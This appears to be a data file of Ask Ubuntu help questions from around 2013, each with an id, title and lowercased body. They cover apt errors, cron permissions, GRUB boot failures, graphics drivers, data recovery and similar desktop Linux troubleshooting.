296092	grizzly error pops up every time	apt-get is not known on line 3 in source list /etc/apt/sources.list.d/grizzly.list . when i go into this file i have to write down some commands as written in openstack manual doc 's : deb http : //archive.gplhost.com/debian grizzly main deb http : //archive.gplhost.com/debian grizzly-backports main apt-get update apt-get install gplhost-archive-keyring after i 've written them down , the next step is to write down another command to upgrade the system sudo apt-get update & & apt-get upgrade but when i execute it , the error pops up every time as i mentioned above .
296095	how can i ensure the `snd-hda-intel` module is loaded on startup ?	i need to type sudo modprobe snd-hda-intel in order to get my sound card to work . what config file do i need to edit and what edit should i be looking to make so i can get the sound driver loading at start up so i do n't have to type this every time ?
296103	installing ubuntu on a usb hard drive from a usb stick	i am trying to install ubuntu on a usb hard drive from a usb stick ( as i understand installing from cd should be much easier , but cd drive is not working , unfortunately ) . first i tried to install xubuntu 13.04 . the installer reported that installation was successful , but after restart i was not able to boot neither from the internal hard drive nor from the usb hard drive . i managed to fix grub on the internal hard drive by booting from usb stick , chroot'ing and running update-grub . but the same approach did not work for the usb hard drive . i found some advices on the internet like removing internal hard drive before installation process or trying ubuntu 12.04 instead of ubuntu 13.04 ( because the latter takes efi/uefi into account , which somehow can get things messed up ) . neither of these approaches did work . when trying to boot from the usb drive i get the message error : file not found grub rescue > could someone give me any advice on how to solve this problem ? also is it possible to create an ubuntu installation by using `` startup disk creation '' program and then just adding user to the system manually and installing all required software ?
296107	all commands in my crontab fail with `` permission denied ''	crontab -e and crontab -l work just fine : $ crontab -l | grep -v '^ # ' * * * * * /usr/bin/env * * * * * echo 'hello from crontab' however , i see two messages like this every minute in /var/log/syslog : mon dd hh : mm:01 username cron [ pid ] : permission denied so the crontab is being read , but somehow it ca n't execute anything at all ( of course i verified the commands when logged in as the same user ) . any idea why ? /etc/cron.allow and /etc/cron.deny do not exist . crontab is set group setuid : $ stat -- format ' % a % u % g ' /usr/bin/crontab -rwxr-sr-x root crontab the crontabs directory seems to have the right permissions : $ stat -- format ' % a % u % g ' /var/spool/cron/crontabs drwx-wx -- t root crontab the crontab itself is owned by me ( not surprisingly , since i 'm able to edit it ) : $ sudo stat -- format ' % a % u % g ' /var/spool/cron/crontabs/ $ user -rw -- -- -- - username crontab i am not a member of the crontab group . these lines appear in /var/log/auth.log every minute ( thanks @ alaa ) : mon dd hh : mm:01 username cron [ 1752 ] : pam_unix ( cron : session ) : session opened for user username by ( uid=0 ) mon dd hh : mm:01 username cron [ 1752 ] : pam bad jump in stack maybe pam is broken ? pam-auth-update ( thanks @ coteyr ) lists all of these , and all of them are enabled : unix authentication gnome keyring daemon - login keyring management ecryptfs key/mount management consolekit session management inheritable capabilities management can any of them be safely disabled ? i 'm not using any encrypted filesystems . based on a debian bug entry i tried running debconf-show libpam-runtime , and i got the following error message : debconf : dbdriver `` passwords '' warning : could not open /var/cache/debconf/passwords.dat : permission denied the contents of /etc/pam.d/cron : # the pam configuration file for the cron daemon @ include common-auth # read environment variables from pam_env 's default files , /etc/environment # and /etc/security/pam_env.conf . session required pam_env.so # in addition , read system locale information session required pam_env.so envfile=/etc/default/locale @ include common-account @ include common-session-noninteractive # sets up user limits , please define limits for cron tasks # through /etc/security/limits.conf session required pam_limits.so session [ success=1 default=ignore ] pam_succeed_if.so service in cron quiet use_uid the files mentioned ( /etc/environment , pam_env.so , /etc/default/locale , pam_limits.so , pam_succeed_if.so ) are all readable by my user . on another host with ubuntu 13.04 , with the same user crontab , no /etc/cron . { allow , deny } , same permissions as above , and not being a member of the crontab group , it works just fine ( logs the commands but not the output in /var/log/syslog ) . by changing the first crontab line : * * * * * /usr/bin/env > /tmp/env.log 2 > & 1 and checking that /tmp is world writeable : $ sudo -u nobody touch /tmp/test $ ls /tmp/test /tmp/test $ ls -ld /tmp drwxrwxrwt 15 root root 12288 may 27 10:18 /tmp i 've verified that the crontab commands are not run at all : the permission denied messages still show up in /var/log/syslog , but /tmp/env.log is not created . based on a random listing of /etc/pam.d settings i found the following discrepancies : $ grep '^ [ ^ # ] ' /etc/pam.d/sshd @ include common-auth account required pam_nologin.so @ include common-account @ include common-session session optional pam_motd.so # [ 1 ] session optional pam_mail.so standard noenv # [ 1 ] session required pam_limits.so session required pam_env.so # [ 1 ] session required pam_env.so user_readenv=1 envfile=/etc/default/locale @ include common-password $ grep '^ [ ^ # ] ' /etc/pam.d/common-session session [ default=1 ] pam_permit.so session requisite pam_deny.so session required pam_permit.so session optional pam_umask.so session required pam_unix.so session optional pam_ecryptfs.so unwrap session optional pam_ck_connector.so nox11 $ grep '^ [ ^ # ] ' /etc/pam.d/common-account account [ success=1 new_authtok_reqd=done default=ignore ] pam_unix.so account requisite pam_deny.so account required pam_permit.so $ grep '^ [ ^ # ] ' /etc/pam.d/common-session-noninteractive session [ default=1 ] pam_permit.so session requisite pam_deny.so session required pam_permit.so session optional pam_umask.so session required pam_unix.so session optional pam_ecryptfs.so unwrap pam packages installed : $ dpkg -- get-selections | grep -- invert-match deinstall | cut -- fields 1 | grep pam libpam-cap libpam-ck-connector libpam-gnome-keyring libpam-modules libpam-modules-bin libpam-runtime libpam0g python-pam i tried reinstalling these - did n't help : $ sudo apt-get install -- reinstall $ ( dpkg -- get-selections | grep -- invert-match deinstall | cut -- fields 1 | grep pam ) i ca n't purge and then reinstall these because of unmet dependencies .
296108	install poedit 1.5+ in ubuntu 12.04	i am running ubuntu 12.04 which comes with poedit 1.4.6 . is there any way to install poedit 1.5+ without compiling it from source ? update : i 'd rather not upgrade to 13.04 , if at all possible
296109	need to recover data from a data hard disk that i used testdisk on in my attempt to repair mbr from a rootkit virus	before i begin to say what my situation is here , please know i would be forever grateful for anyone who can help me out with this mess . i have photos on here from years and years of painstaking work . i am a semi-pro photographer and my hard disk contains roughly 1.5 tb of data from photos . plus 100gb of my entire music library , and all my dvd 's i took time to tip on to my hard disk . but my photos are what i 'm most concerned about , they are not replaceable . now here in short is what happened : i have always had a backup of my data using backblaze , which is an online backup for windows . i decided about 3 months ago i wanted to get a server going for my files using plex and decided unbuntu was the best way to go . so i was utilizing this backup method using something called `` greyhole '' and in the process of setting up ( 2 ) 2tb hard drives and ( 1 ) 1 tb harddrive on this greyhole backup program . then that is when i got a rootkit . this thing was nasty and i think after 2 months of trying everything , i had to reflash my bios and still had this virus . i had to reformat all my hard drives and backed everything up on to 1 hard drive filling it almost entirely ( a 2 tb hard drive ) . i still did not get rid of this virus it was incredible . eventually i caught it . it was embedded in my network ethernet card . anyone reading this should take heed that anything embedded in there can and will infect your router , all your lan , and stay on your computer even through reflashing of the bios itself ! anyhow after i seemed to get rid of the thing i still had my files on my hard drive . i did n't want to reinfect my machines , so i tried to re-write the mbr using a utility called testdisk . big mistake i did n't have a clue what i was doing . and now i ca n't read my information ! here is the good news ? after testdisk did it 's thing ( which consisted of me analysizing the drive , and using the write command to do the damage , it only took 1 second for it to be done . meaning - i did n't sit through a 5 hour process of writing 0 's on the drive with `` dd '' . it was a quick little thing i did . so for that reason i 'm thinking the data still has to be on the drive . here is what i know : the drive is a data drive , no os . i used ubuntu as the os on another drive . formatted as ext3 or ext4 size = 2 tb files = irreplaceable , my entire lifes work - no exageration . also - backblaze does n't have my files anymore because it 's been over 30 days . i have written over all my othre backups with 0 's due to the rootkit . this hard drive was and is the only source of my files at the time when this happened . coincidently this is the only time i 've been without a backup for many years . here is a copy/paste of fdisk -l disk /dev/sda : 2000.4 gb , 2000398934016 bytes 255 heads , 63 sectors/track , 243201 cylinders , total 3907029168 sectors units = sectors of 1 * 512 = 512 bytes sector size ( logical/physical ) : 512 bytes / 4096 bytes i/o size ( minimum/optimal ) : 4096 bytes / 4096 bytes disk identifier : 0x0006a14b device boot start end blocks id system /dev/sda1 * 63 3907024064 1953512001 83 linux partition 1 does not start on physical sector boundary . and lshw *-scsi:0 physical id : 2 logical name : scsi2 capabilities : emulated *-cdrom description : dvd writer physical id : 0.0.0 bus info : scsi @ 2:0.0.0 logical name : /dev/cdrom logical name : /dev/sr0 capabilities : audio cd-r cd-rw dvd dvd-r configuration : signature=643a3365 status=ready *-disk description : ata disk product : st2000dm001-1ch1 vendor : seagate physical id : 0.1.0 bus info : scsi @ 2:0.1.0 logical name : /dev/sda version : cc24 serial : w1e2l5k7 size : 1863gib ( 2tb ) capabilities : partitioned partitioned : dos configuration : ansiversion=5 sectorsize=4096 signature=0006a14b *-volume description : ext3 volume vendor : linux physical id : 1 bus info : scsi @ 2:0.1.0,1 logical name : /dev/sda1 version : 1.0 serial : 05ea2f85-06fd-446c-a885-30614d53630c size : 1863gib capacity : 1863gib capabilities : primary bootable journaled extended_attributes large_files recover ext3 ext2 initialized configuration : created=2013-03-27 07:57:02 filesystem=ext3 label=fuck modified=2013-03-27 08:11:50 mounted=2013-03-27 08:11:50 state=clean please help what can i do ? i 'm scared of screwing it up again with testdisk . i just want to recover the files . i ca n't see how they are gone . thank you so much-
296111	where has the /var/run/nm-dns-dnsmasq.conf file gone ?	in 12.04 i could find out which nameservers are registered by `` cat '' ing the /var/run/nm-dns-dnsmasq.conf file , but now in 13.04 this file has gone . where is it or how else can i get this list ? thank you in advance !
296115	extract an .mzp on ubuntu	as above , is there any way to perform an extraction of a .mzp file on ubuntu ? the interwebs have nothing for me : p .
296116	installing ubuntu without any os	is it possible to install ubuntu without having a operating system ? i have tried to install through usb and do not have access to dvd/cd at the moment . can anyone help ? i got the following error codes : squashfs error : squash_read_data failed to read block 0x6b56569 the squashfs error : unable to read fragment cache entry unabble to readpage ; block 6b56569 , size d607 fat-fs ( sdb1 ) : unable to read : node for block updating ( i_pos 262162 ) i am booting it on toshiba satellite l855d-s5220
296117	ca n't connect to mysql server which is running	i installed the latest mysql ubuntu distribution on my ubuntu 13.04 . the installation of the localhost server was succesfull and was working fine for a while . after creating a couple models ( with no data in and saving them in my /home/ ... folder ) on the server through mysql workbench i could n't connect to the server anymore . the workbench indicates that the server is running , but there is no connection to the server . when trying to access the server through terminal i get the following message : root @ simo-n150-n210-n220 : ~ # mysql -u root -p mysql enter password : error 1045 ( 28000 ) : access denied for user 'root ' @ 'localhost ' ( using password : yes ) after creating the two models on the server i also used the mdbtools to export some tabels from my old ms access database ( as csv ) . this should not have any impact on mysql server . as far as i understand , the firewall has n't blocked anything . what can i do ? ?
296119	login screen/background change ? ( kubuntu )	i have kubuntu 13.04 ( last version ) and lightdm i want to change my login screen background ( not my wallpaper after i type my password . i 'm talking for the image you see when you type your password ) . it shows a greyish `` image '' right now . when i tried to use a picture from home and restarted the screen became white and it did n't show my image . i searched and found out that it because of some setings . the problem is i 'm very new to kubuntu and i do n't want to mess things up with complicated setting from the terminal etc or to mess aroud with the root files because i wo n't be able to fix things . is there a simple solution as to how can i change this image ? there is no option for me to download something there but only to load a picture . thank you very much in advance
296127	how to access system preferences in ubuntu 12.04	recently had to install ubuntu 12.04 as my previous ubuntu which i 'd used for 3 years stopped working . i 'm finding 12.04 extremely frustrating , i ca n't seem to access anything , for example now i 'm trying to get to system preferences , so i can change ibus preferences . i checked the answers which were already given on this forum for the question how do i find âsystem > preferencesâ however , the answers that were given just tell how to find system settings - well , that is easy , there is a tab for system settings on this 12.04 , but amazingly system settings does not seem to have system preferences or most of the other things one would reasonably expect to find under settings ! it only has tabs for things like appearance , keyboard , etc .
296131	logon wallpaper differs from user wallpaper	since i changed my wallpaper , i noticed that the logon screen did n't update . it still uses the wallpaper before i updated it . this is in ubuntu 13.04 . anywone any suggestions ? i have been playing around with ccsm and unity tweak tool , so maybe i did something wrong there .
296139	screen brightness stuck on max setting , fn+down only brings it down one level	edit : updating to ubuntu 13.10 solved this issue for me out of the box . i 'm trying to get some control over the brightness of my samsung qx411 ( integrated intel graphics ) on ubuntu 3.04 ( though i have the exact same issue on 12.04 and on mint ) using fn+up/down lowers the screen brightness from max to one peg down or back up . if i try to bring the brightness down any more , it flickers but stays the same . i have full control of the brightness in settings , but that 's delicate and gets reverted to full max if i open up the brightness settings again , use fn+up/down , the screen goes into power saving , or after log out . the closest i got was adding acpi_backlight=vendor to a line in /etc/default/grub , [ source ] i could consequently lower the brightness a couple of pegs down to the minimum with fn+down , but then it 's as if the problem got inversed , and i 'd get stuck in the bottom tier , i could only increase the brightness by one peg and back down . rebooting would revert to max brightness . adding acpi_osi= , acpi_osi=linux , acpi_osi=vendor , acpi_osi= ' ! windows 2012 ' , acpi_backlight=linux , acpi_backlight= ' ! windows 2012' instead did n't do anything for me . i 've also tried adding echo 2000 > /sys/class/backlight/intel_backlight/brightness to /etc/rc.local , where my max value from cat /sys/class/backlight/intel_backlight/brightness is 4648 , which did n't do anything . ( same result with echo 2000 > /sys/class/backlight/acpi_video0/brightness ) source samsung tools also did n't help in this regard . i 've spent days on this , it 's getting quite frustrating . any help would be greatly appreciated .
296142	installation error on ubuntu 12.10 ( x64 ) for octave 3.6.2	i 'm having a very frustrating problem when installing octave . i already had it installed , but i was not able to run it anymore , the executable simply wo n't run . that 's why i removed it and tried to re-installed it , but if i run sudo apt-get install octave i receive the following error : dpkg : error processing octave ( -- configure ) : subprocess installed post-installation script returned error exit status 139 . errors were encountered when processing : octave e : sub-process /usr/bin/dpkg returned an error code ( 1 ) if i , instead , use ubuntu software center , the error returns also ( in addition to what already reported ) : segmentation fault ( core dumped ) i 've also tried to install octave after adding the ppa ppa : octave/stable but nothing changed ... i really do n't understand what can cause a segmentation fault and i really do n't know where to bang my head thanks for any help !
296150	how to install ubuntu 12.04 from terminal/tty1 ?	i 'm not very familiar with ubuntu , hope to not bother you too much . i had ubuntu 12.04 lts on my hp pavillion dv7-2005eg , after not being able to fix the intel/amd hybrid graphics disaster in 12.10 . everything went smooth until i gave in to the always popping up upgrade to 13.04 window ... well since then , nothing is working . if i boot i get the 'running in low graphic mode ' prompt and can only access tty1 . trying to install the drivers from there did n't work , flgrxinfo always tells me that 'error : unable to open display ( null ) ' although it 's installed , i do n't even know how these things are connected . my question is can i reinstall ubuntu 12.04 from that terminal , it has internet connection . i tried to boot it from a usb drive created on mac os with unetbootin but it simply does n't boot that even if i choose it from the bios boot list . would be real grateful , have been searching on-line but could not find anything like that , sorry if it 's a double post . thanks in advance ...
296152	how to check what is my network card on ubuntu ?	i just installed ubuntu and wireless was not working , so i made a question : wi-fi not working on asus x75vd i got many answers to give my network card , so i made this question . please answer quickly !
296155	how can i remap keyboard keys ?	i am looking for general instructions on remapping keys . can someone tell me how to remap f9 to prtscr and f10 to scrolllock button ? i have looked through every thread here and none of the suggestions worked . i am using a swedish keyboard setup and ubuntu 12.04 .
296163	black screen on login	i have serached around , but no fix could help me . here 's what happened : a few days ago , for no reason , i could n't see the login screen on my ubuntu 12.04. nor do anything but reboot using ctrl+alt+del . after reading some suggestions and experimenting , this is what i got so far : if i go to the recovery mode and then choose `` resume normal boot '' i can see the boot up text , and it stops at `` checking battery state '' . if i choose `` failsafe graphics mode '' it stops on a different point , one of the last messages being from xserver saying `` fatal server error no screens found '' i realized that i can get to the desktop if when the black screen appears i use ctrl+alt+f1 and blindly type my username and password , and then use `` startx '' . i get to my desktop , but no menus at all . at least i can use the terminal this way . i tried reinstalling xorg and nvidia drivers ( using the current ones ) but it did n't help i deleted the ~/.config/monitors.xml and ~/.config/monitors.xml~ but that only got my resolution to reset to the default one after blind login and use of startx any suggestions , anyone ? any logs i need to provide you with ? i would like to note an important piece of info : i had my geforce 6600gt and then upgraded to geforce 8800gt . it died after like three weeks , and then i put back my old 6600gt . it worked fine the first day , so i was thinking if it 's possible to install older nvidia drivers ( like version 220.xx ) , using the terminal , could that help ? and how do i do that ? thanks in advance ! update : i managed to try all the driver versions available in `` additional drivers '' but none helped . still , the only way to access the desktop is via startx and no menus are shown .
296164	password for gui not working but same password in command prompt is working	while installing ubuntu 12.04 i choose the language and keyboard as english ( uk ) . i changed them to english ( usa ) later . after this i 'm not able to login in gui , whereas i 'm able to login in command prompt . this is strange . someone kindly help me .
296167	ca n't upgrade the system	i wanted to upgrade the sytem so i write apt-get upgrade when it arrive to setting up se-toolkit ( 4.2.1-bt0 ) ... it shows me : errors were encountered while processing : se-toolkit subterfuge e : sub-process /usr/bin/dpkg returned an error code ( 1 ) can you help me please ?
296168	how to decide on the right nvidia driver based on the linux kernel version ?	after trying to install the nvidia drivers and got them working and then got them broken , i would like to check one important thing : one of the main problems i run into was `` kernel version and nvidia driver version mismatch ! '' . how to avoid this ? how do i know that the newest nvidia driver out there is compatible with what i have already installed or have ? for example right now , i started with a fresh xubuntu 13.04 , kernel : 3.8.0-21-generic . i know that there is a new nvidia driver for linux : 319.17 . so do i go with the `` ./*.run '' file approach or do i set-up one of those external repositories , for example `` xorg-edgers '' , what should be the correct approach ? also , once i install them , how do i ensure that the nvidia drivers will not break with a kernel update ? thanks .
296172	/dev/mapper/ full	hi all i have a issue where my system would n't login or startup properly . i checked the hard drive space to find the below . matthew @ kronos : ~ $ df -h filesystem size used avail use % mounted on /dev/mapper/kronos -- vg-root 214g 203g 0 100 % / none 4.0k 0 4.0k 0 % /sys/fs/cgroup udev 7.8g 4.0k 7.8g 1 % /dev tmpfs 1.6g 928k 1.6g 1 % /run none 5.0m 0 5.0m 0 % /run/lock none 7.8g 4.0k 7.8g 1 % /run/shm none 100m 8.0k 100m 1 % /run/user overflow 1.0m 36k 988k 4 % /tmp /dev/sda1 228m 55m 161m 26 % /boot zeus 1.8t 1.3t 540g 71 % /zeus how do i fix this 100 % full , i do not have a bigger hard drive to give it , am i stuck with having to buy a bigger drive for it ? i 'm fairly new to ubuntu and linux so please provide full command line commands i need to use . thanks in advance .
296174	converting pdf doc to image as preserving the pdf quality at image ?	i have looked to the site and find convert like programs and used them however i can not preserve the quality of the pdf file . i have changes the options for better resolutions but this time the size was increased so much . i can not find the optimal setting for the conversion . is there any other tool or method to preserve the pdf quality ? or any program to see the specs of the pdf files to define them as argument of the conversion software ? thanks
296176	how can i fix this graphical error ?	i have a radeon hd 4670 and when i log in the first time to my machine after boot / reboot , i always encounter this picture for a few seconds until everything loads up : i do n't think it 's my card 's fault but rather the driver 's because when everything is loaded it works fine and i 've never encountered any errors . it also works right in win , but i do n't plan going back at all .
296187	can you install softwares on a wubi-installed ubuntu ? 12.04 lts	i installed ubuntu 12.04 lts with wubi so i can choose to boot from windows or ubuntu with some simple key presses . but when i tried to download google chrome for linux ( on the official website it says it works for ubuntu too ) 64-bit version in .deb format and ubuntu software center opened it , i got an error that says can not install 'libasound2 : i386' and i searched 'google chrome ' in ubuntu software center and it showed this 'chromium web browser ' . when i clicked install , it asked me for 'authentication ' ( which never showed up before ) and then it showed this : package dependencies can not be resolved this error could be caused by required additional software packages which are missing or not installable . furthermore there could be a conflict between software packages which are not allowed to be installed at the same time . what should i do ? is this because of my wubi-installed ubuntu ?
296192	are i915 kernel options still required with 13.04 ?	my /etc/default/grub has these kernel options , which were required to improve battery life when i originally installed 12.04 : pcie_aspm=force i915.i915_enable_rc6=1 i915.i915_enable_fbc=1 i915.lvds_downclock=1 are these still required now that i 've upgraded to 13.04 ? hardware is a dell xps 17 .
296193	wubi wo n't start	trying to install ubuntu on old xp computer . it wo n't boot from cd and when i open cd it wo n't run wubi because it is n't a valid win32 application . cd works ok on win7 and vista machines . do i need a different download ? have ubuntu-12.04.2-desktop-i386.iso
296195	i was able to run ubuntu from the live cd on an asus windows 8 touch screen laptop . however when i take the cd out i am not able to boot into windows	i used this method installing ubuntu on a pre-installed uefi supported windows 8 system . i followed the process as described by luis the live cd installation works , i can see the my data that was under windows 8 , however i am not able to boot into windows 8 . when i remove the cd .
296196	aptitude ugrade does not change my kernel	sorry if the title is not very clear . this is rather new to me . i have ran this 10.04.4 lts server for over a year now . i have dutifully used aptitude update / aptitude upgrade on a regular basis then rebooted my server when advised to do so . today i was warned that /boot was running out of space . so i started looking into the removal of old kernels . $ uname -r 2.6.32-38-server then i looked at /boot and found that i had more recent versions of the kernel -rw-r -- r -- 1 root root 8547102 dec 22 2011 /boot/initrd.img-2.6.32-37-server -rw-r -- r -- 1 root root 8535914 jan 25 2012 /boot/initrd.img-2.6.32-38-server -rw-r -- r -- 1 root root 8539717 mar 20 2012 /boot/initrd.img-2.6.32-39-server -rw-r -- r -- 1 root root 8538788 apr 10 2012 /boot/initrd.img-2.6.32-40-server -rw-r -- r -- 1 root root 8538887 aug 11 2012 /boot/initrd.img-2.6.32-41-server -rw-r -- r -- 1 root root 8546431 oct 5 2012 /boot/initrd.img-2.6.32-42-server -rw-r -- r -- 1 root root 8545858 oct 5 2012 /boot/initrd.img-2.6.32-43-server -rw-r -- r -- 1 root root 8545789 oct 14 2012 /boot/initrd.img-2.6.32-44-server -rw-r -- r -- 1 root root 8547103 feb 24 11:25 /boot/initrd.img-2.6.32-45-server -rw-r -- r -- 1 root root 8546521 apr 19 06:55 /boot/initrd.img-2.6.32-46-server -rw-r -- r -- 1 root root 8545660 may 15 06:41 /boot/initrd.img-2.6.32-47-server this is confirmed by dpkg $ dpkg -l | grep linux-image ii linux-image-2.6.32-37-server 2.6.32-37.81 linux kernel image for version 2.6.32 on x86 ii linux-image-2.6.32-38-server 2.6.32-38.83 linux kernel image for version 2.6.32 on x86 ii linux-image-2.6.32-39-server 2.6.32-39.86 linux kernel image for version 2.6.32 on x86 ii linux-image-2.6.32-40-server 2.6.32-40.87 linux kernel image for version 2.6.32 on x86 ii linux-image-2.6.32-41-server 2.6.32-41.94 linux kernel image for version 2.6.32 on x86 ii linux-image-2.6.32-42-server 2.6.32-42.96 linux kernel image for version 2.6.32 on x86 ii linux-image-2.6.32-43-server 2.6.32-43.97 linux kernel image for version 2.6.32 on x86 ii linux-image-2.6.32-44-server 2.6.32-44.98 linux kernel image for version 2.6.32 on x86 ii linux-image-2.6.32-45-server 2.6.32-45.104 linux kernel image for version 2.6.32 on x86 ii linux-image-2.6.32-46-server 2.6.32-46.108 linux kernel image for version 2.6.32 on x86 ii linux-image-2.6.32-47-server 2.6.32-47.109 linux kernel image for version 2.6.32 on x86 ii linux-image-server 2.6.32.47.54 linux kernel image on server equipment . /boot/grub/grub.cfg has only one entry ( menu ? ) # # # begin /etc/grub.d/10_linux # # # menuentry 'ubuntu , with linux 2.6.32-38-server ' -- class ubuntu -- class gnu-linux -- class gnu -- class os { recordfail insmod ext2 set root= ' ( hd0,1 ) ' search -- no-floppy -- fs-uuid -- set f2ed5eb3-d3e5-4cc2-b45d-7190337be222 linux /vmlinuz-2.6.32-38-server root=uuid=1cdc82de-7361-47f3-aeda-21b6929ef256 ro quiet splash initrd /initrd.img-2.6.32-38-server } i 'd like your advice on how i can get 'aptitude upgrade ' to update grub . i could also use some pointers as to how to cleanup some of this mess . i found some posts that each seems to solve a piece of the puzzle . i 'm a bit reluctant to try anything as my server is headless and remote ( colo ) .
296197	how to find out the package download count from a ppa ?	i 'd like to know how many downloads of a given package in a ppa there have been since it was first published . i remember there was a bug about it about getting these metrics on the web ui , but as far as i know , it never got implemented . but i think the number of downloads can nevertheless be obtained via the launchpad api if i 'm the owner of that ppa . any pointers ?
296207	ubuntu arm 13.4	i am looking at purchasing a samsung chromebook with the integrated 3g ( exynos5 based one ) . i am trying to find out if the following packages are available in the ubuntu arm version that can be made to work on the chromebook : libreoffice4 including base mysql php apache web server netbeans 7.0x mono monodevelop i ca n't seem to find anywhere that tell me if these packages are available for the distro . it would also be great to know if the 3g modem is supported in any form as i would like to work from anywhere . does anyone either know the answers or know where i can find the answers ?
296208	ubuntu does n't boot after install	i 've installed ubuntu 12.04 on my computer , everything worked properly untill i install update packages , ubunto wo n't boot after restart , my screen goes blank . i 've reinstalled ubuntu twice and now for the third time ubuntu wo n't even boot after installation ... ? ! i run a medion computer , p4 2.4ghz dual 1gb memory , 256mb geforce 6200 , 250gb hdd . ( sata ) what can i do ? somebody help plzz because there 's no way i 'm going to run windows again ! edit : found the problem for not booting after installation , i'vr chosen to install updates during installation , so running installation again right now without updates , but still do n't understand why updates from ubuntu would cause it not to boot ? should i not run updates at all ?
296214	what leads to outdated user applications ?	currently i 'm thinking about switching completly to a linux distribution . i actually like ubuntu alot , but i have some concerns about outdated ( user ) applications . it 's recommended to use the official repositories to install any kind of software ( i 'm aware , that there are other possibilities like ppas etc. ) . as far as i know , applications which are in this repository are n't updated for a specific ubuntu version ( e.g . app a ver 1.6 is available in ubuntu 12.10 , devs create version 1.7 ( no securityfixes , just a functional update ) and it would n't be available in the official repository til ubuntu 13.04 ) . there are some exceptions like firefox , but for the majority of the apps , there are no ( functional ) updates within 1 ubuntu iteration . i 'm also aware , that there are distributions which follow a rolling release model . there you get updates very soon after they are released . the downside there is the stability . it 's possible , that you break your system with an update . i just wanted to ask , what leads to this situation on the technical side . in my understandig it should be possible to update every kind of user application ( chromium , gimp , ... - everything which is not part of the operating system itself ) , without breaking any essential system functionality ( like it 's the case in windows/mac os x , it 's very unlikly to break your system with an update to some user applications ) . is it because backward compatibilty issues with some libraries ? so e.g . app x requires a function from lib a ( ver 1.0 ) . app y requires another function from lib a ( ver 1.1 ) . the devs of lib a decided to drop the specific function , which is needed in app x in version 1.1 . if a user installs app y , which requires lib a in version 1.1 , lib a will be updated from 1.0 to 1.1 . in this case you would break the functionality for app x . is this an situation which could occure ? how 's the update mechanism for libraries in linux ? would an update overwrite the previous version of a library ? do systemcritical parts use libraries which are used in user applications too ? ( so if a library is updated in terms of a user application update , could it break system functionality ? ) if the situation has nothing to do with libraries , could you explain which possible problems lead to this situation ? thank you !
296222	when trying to run android studio sh file , chmod +x and checkbox just instantly fails ( as root too )	i want to run the new android studio ide just released at google i/o 2013 , and when i try to execute studio.sh , it opens it in a text editor . if i enable running as application in properties , it instantly unchecks the checkbox . when i chmod +x it and then run it , it says permissions denied . i do the same thing as root ( sudo su ) , and it says command not found . i use vanilla sudo for both of them . command not found . how do i execute the file ?
296223	can not change to unity 3d !	major problem here and i 'd appreciate some help ! i was installing wine and steam to get my games running . got everything installed and configured , and my games were working . however after that , the update manager popped up to say that i needed to update my system . i ran the updates , and then the cogwheel in the corner of the screen turned red , because i needed to reboot . i rebooted , and now i can not change the size of my unity launcher , and none of my wine applications will run ! ! i logged out and actually selected ubuntu 3d from the login menu , then logged in again , but i still can not change the size of my launcher , and my wine apps will not work ! i even tried ccsm and changed the size manually , but it did n't work . also noticing that when i click on dash it takes a long time to actually open , which it was n't doing before . if it helps i now have two extra options when i choose ubuntu 3d - i have `` gnome classic '' and `` gnome classic ( no effects ) '' , but where these came from i have no idea . what the hell have i done to mess up my system ? : - ( someone please help me because i am seriously just considering a reinstall of ubuntu which i do n't want to do !
296224	ubuntu 13.04 hangs at grab after upgrading	i met with a problem or two every single time i upgraded ubuntu to a newer version . and this time , when i upgraded ubunutu from 12.10 to 13.04 the new problem was that , the booting hangs at grub . right after upgrading the system worked well , but once i restarted this problem arose . i have tons of important files in it , really really important .
296231	i need a root password to access my drives , how to install 13.04 ?	my pc crashed a week ago and by using multi bios i found i could `` try or install ubuntu '' . i have never used this before and every time i try to access my drives it says i need a root password or i need to authenticate . i have googled these things but the answers seem aimed at experts , not noobs . i appear to be running 11.10 signed in as a `` guest '' but when i download 13.04 , i have no idea how to install it . can anyone help ?
296235	how do i replicate my current manual internet configurations in 12.04 ?	my current internet configuration is no longer automatic . here is a screenshot of the manual configurations in windows 8 ( which i ditched for 12.04 ) how do i set up this configuration in 12.04 ? thanks in advance
296236	64-bit ubuntu runs very slow	i recently replaced my 32-bit 12.04-lts by 64-bit 13.04 , but the 64-bit version runs very slow on my current computer ( compared with the speed when i run 32-bit ) . here is the info of the hardware : cpu : amd e-350 1.6ghz ( announced in nov 2010 ) graphics : radeon hd 6310 ram : 6gb 1066-mhz when i first bought this computer , it run windows 7 64-bit very well : basically just like a desktop only when i run huge applications . my guess is that though my computer should be able to run 64-bit version linux , but the hardware was too old and actually reduced the performance , just like if you run windows 8 on an old pentium 4 platform . plus , for the first several times i installed this 64-bit version , after my computer started , it shows that `` can not find operating system '' , which is very weird . does anyone know why that happened ?
296239	is there a compatability issue with ubuntu 13.04 and razer products ?	i am trying to install ubuntu 13.04 on a clean system and am running into an issue with the computer not recognizing my mouse and keyboard ( razer deathadder and lycosa ) . i have looked at a lot of the forums and they mention an issue with this back in the beta for 12.04 some of the fixes involve going into the terminal and adding/changing the settings , but because of the lack of a mouse and keyboard i can not do what is required . is there any issues with the compatibility of these products , and is there a known fix ? my system : gigabyte 970a-d3 ( uefi bios ) radeon 7970 amd fx 6300 ( trying to intall ) ubuntu 13-04 amd 64bit desktop ( from liveusb ) thanks for the help . edit : just to note , prior to selecting the ubuntu boot from the liveusb , the keyboard and mouse both flicker then go dark . i have also tried a few other keyboards i have laying around but none work . they have all been usb .
296243	is there a way to print preferably to a connected printer ?	i use my laptop in two offices , each one with its printer connected via usb . unfortunately i keep sending documents to print to the wrong printer . i would like my documents to be send automatically to the attached printer . does someone know how ?
296244	proprietary ati driver fglrx kills my video	so , i 'll explain the problem , but first i want to cry aloud please help ! i 've used ubuntu 12.04 for more than half an year and everything is set up just the way i want it . but i did a stupid mistake - i installed proprietary ati driver fglrx . now the system boots normally , but after i choose to launch ubuntu the screen goes black and my monitor does n't receive any signals . i tried some guides in recovery mode , but it 's not working . finally i started live cd and replaced files in /usr/share/x11/xorg.conf.d/ with original files . still not working . please give me any ideas how to remove this killer !
